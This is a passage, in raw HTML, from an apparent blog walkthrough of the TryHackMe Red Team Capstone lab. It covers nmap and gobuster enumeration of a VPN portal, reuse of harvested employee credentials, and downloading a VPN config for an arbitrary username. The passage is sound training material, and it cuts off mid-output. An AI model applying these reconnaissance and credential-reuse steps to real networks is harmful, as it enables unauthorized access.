#C3E88D\">tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ports<\/span><span style=\"color: #BABED8\"> (conn-refused)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">PORT<\/span><span style=\"color: #BABED8\">      <\/span><span style=\"color: #C3E88D\">STATE<\/span><span style=\"color: #BABED8\">    <\/span><span style=\"color: #C3E88D\">SERVICE<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">VERSION<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">22\/tcp<\/span><span style=\"color: #BABED8\">    <\/span><span style=\"color: #C3E88D\">open<\/span><span 
style=\"color: #BABED8\">     <\/span><span style=\"color: #C3E88D\">ssh<\/span><span style=\"color: #BABED8\">      <\/span><span style=\"color: #C3E88D\">OpenSSH<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">7.6<\/span><span style=\"color: #C3E88D\">p1<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Ubuntu<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">4<\/span><span style=\"color: #C3E88D\">ubuntu0.5<\/span><span style=\"color: #BABED8\"> (Ubuntu <\/span><span style=\"color: #C3E88D\">Linux<\/span><span style=\"color: #89DDFF\">;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">protocol<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2.0<\/span><span style=\"color: #BABED8\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">ssh-hostkey:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">2048<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">02<\/span><span style=\"color: #C3E88D\">:08:13:2d:6b:a2:0d:9b:97:4b:54:7e:ac:5d:29:a7<\/span><span style=\"color: #BABED8\"> (RSA)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">256<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">13<\/span><span style=\"color: #C3E88D\">:13:fb:37:7e:4e:ec:f2:b8:0e:13:74:75:32:c2:10<\/span><span style=\"color: #BABED8\"> (ECDSA)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">256<\/span><span style=\"color: 
#BABED8\"> <\/span><span style=\"color: #C3E88D\">de:f8:5c:79:45:d3:b2:77:0b:31:0a:7e:14:3c:82:37<\/span><span style=\"color: #BABED8\"> (ED25519)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">80\/tcp<\/span><span style=\"color: #BABED8\">    <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">     <\/span><span style=\"color: #C3E88D\">http<\/span><span style=\"color: #BABED8\">     <\/span><span style=\"color: #C3E88D\">Apache<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">httpd<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2.4<\/span><span style=\"color: #C3E88D\">.29<\/span><span style=\"color: #BABED8\"> ((Ubuntu))<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_http-title:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">VPN<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Request<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Portal<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_http-server-header:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Apache\/2.4.29<\/span><span style=\"color: #BABED8\"> (Ubuntu)<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>We have only two ports open:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>22 for SSH<\/li>\n\n\n\n<li>80 for HTTP<\/li>\n<\/ul>\n\n\n\n<p>Trying SSH on the VPN machine using the credentials we obtained won&#8217;t work. We will move on to Port 80.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"19-http-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">HTTP<\/mark><\/h4>\n\n\n\n<p>The web page has a login form for the VPN server. 
Fortunately, the credentials we have for <code>laura.wood@thereserve.loc<\/code> and <code>mohammad.ahmed@thereserve.loc<\/code> work here!<\/p>\n\n\n\n<div style=\"height:8px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09106d2c&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09106d2c\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"582\" data-attachment-id=\"466\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206100001\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206100001.png?fit=1760%2C1000&amp;ssl=1\" data-orig-size=\"1760,1000\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206100001\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206100001.png?fit=1024%2C582&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206100001.png?resize=1024%2C582&#038;ssl=1\" alt=\"\" 
class=\"wp-image-466\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206100001.png?resize=1024%2C582&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206100001.png?resize=300%2C170&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206100001.png?resize=768%2C436&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206100001.png?resize=1536%2C873&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206100001.png?w=1760&amp;ssl=1 1760w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b091072d5&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b091072d5\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"785\" data-attachment-id=\"467\" 
data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206113851\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206113851.png?fit=1281%2C982&amp;ssl=1\" data-orig-size=\"1281,982\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206113851\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206113851.png?fit=1024%2C785&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206113851.png?resize=1024%2C785&#038;ssl=1\" alt=\"\" class=\"wp-image-467\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206113851.png?resize=1024%2C785&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206113851.png?resize=300%2C230&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206113851.png?resize=768%2C589&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206113851.png?w=1281&amp;ssl=1 1281w\" 
sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:8px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"20-gobuster-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">GoBuster<\/mark><\/h5>\n\n\n\n<p>GoBuster was able to find a directory <code>\/vpn<\/code>. Visiting the directory, we see an <code>OpenVPN<\/code> file. 
We can download the file and read it.<\/p>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><pre class=\"shiki material-theme-ocean\" 
style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/RedTeam-Capstone\/VPN<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">gobuster<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">dir<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-u<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">http:\/\/vpn.thereserve.loc<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-w<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/raft-medium-directories.txt<\/span><span style=\"color: #BABED8\"> 
<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">===============================================================<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Gobuster<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">v3.6<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">by<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">OJ<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Reeves<\/span><span style=\"color: #BABED8\"> (@TheColonial) <\/span><span style=\"color: #89DDFF\">&amp;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">Christian<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Mehlmauer<\/span><span style=\"color: #BABED8\"> (@firefart)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">===============================================================<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Url:                     http:\/\/vpn.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Method:                  GET<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Threads:                 10<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Wordlist:                \/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/raft-medium-directories.txt<\/span><\/span>\n<span 
class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Negative Status codes:   404<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> User Agent:              gobuster\/3.6<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Timeout:                 10s<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">===============================================================<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Starting<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">gobuster<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">in<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">directory<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">enumeration<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">mode<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">===============================================================<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\/vpn<\/span><span style=\"color: #BABED8\">                  (Status: <\/span><span style=\"color: #F78C6C\">301<\/span><span style=\"color: #BABED8\">) <\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">Size: <\/span><span style=\"color: #F78C6C\">322<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">--<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: 
#BABED8\"> http:\/\/vpn.thereserve.loc\/vpn\/<\/span><span style=\"color: #89DDFF\">]<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0910799a&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0910799a\" class=\"wp-block-image size-full wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"916\" height=\"364\" data-attachment-id=\"468\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206100314\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206100314.png?fit=916%2C364&amp;ssl=1\" data-orig-size=\"916,364\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206100314\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206100314.png?fit=916%2C364&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206100314.png?resize=916%2C364&#038;ssl=1\" alt=\"\" class=\"wp-image-468\" 
srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206100314.png?w=916&amp;ssl=1 916w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206100314.png?resize=300%2C119&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206100314.png?resize=768%2C305&amp;ssl=1 768w\" sizes=\"auto, (max-width: 916px) 100vw, 916px\" \/><\/figure>\n\n\n\n<div style=\"height:8px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>This seems like a default template for the OpenVPN file. 
We cannot make use of it because it contains no remote IP information, so we won&#8217;t be able to connect to a VPN server.<\/p>\n\n\n\n<p>After logging in with the credentials we found, we can type a username and click the <code>submit<\/code> button, which downloads an OpenVPN file named after the username we typed.<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"455\" data-attachment-id=\"469\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206114314\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114314.png?fit=2050%2C911&amp;ssl=1\" data-orig-size=\"2050,911\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206114314\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114314.png?fit=1024%2C455&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114314.png?resize=1024%2C455&#038;ssl=1\" alt=\"\" class=\"wp-image-469\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114314.png?resize=1024%2C455&amp;ssl=1 1024w, 
https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114314.png?resize=300%2C133&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114314.png?resize=768%2C341&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114314.png?resize=1536%2C683&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114314.png?resize=2048%2C910&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>On comparing the file that we just downloaded with the template, we noticed that this file has remote IP information&#8211;which means we can use the file to connect to a VPN server.<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" 
data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/RedTeam-Capstone\/VPN]\n\u2514\u2500$ head corpUsername.ovpn                       \nclient\ndev tun\nproto tcp\nsndbuf 0\nrcvbuf 0\nremote 10.200.X.X 1194\nresolv-retry infinite\nnobind\npersist-key\npersist-tun\n                                                                                                   \n\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/RedTeam-Capstone\/VPN]\n\u2514\u2500$ head laura.wood@corp.thereserve.loc.ovpn \nclient\ndev tun\nproto tcp\nsndbuf 0\nrcvbuf 0\nremote 10.200.113.12 1194\nresolv-retry infinite\nnobind\npersist-key\npersist-tun\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/RedTeam-Capstone\/VPN<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">head<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: 
#C3E88D\">corpUsername.ovpn<\/span><span style=\"color: #BABED8\">                       <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">client<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">dev<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">tun<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">proto<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">tcp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">sndbuf<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">0<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">rcvbuf<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">0<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">remote<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.200<\/span><span style=\"color: #C3E88D\">.X.X<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">1194<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">resolv-retry<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">infinite<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">nobind<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">persist-key<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">persist-tun<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">                                                                                                   <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/RedTeam-Capstone\/VPN<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span 
style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">head<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">laura.wood@corp.thereserve.loc.ovpn<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">client<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">dev<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">tun<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">proto<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">tcp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">sndbuf<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">0<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">rcvbuf<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">0<\/span><\/span>\n<span class=\"line\"><span 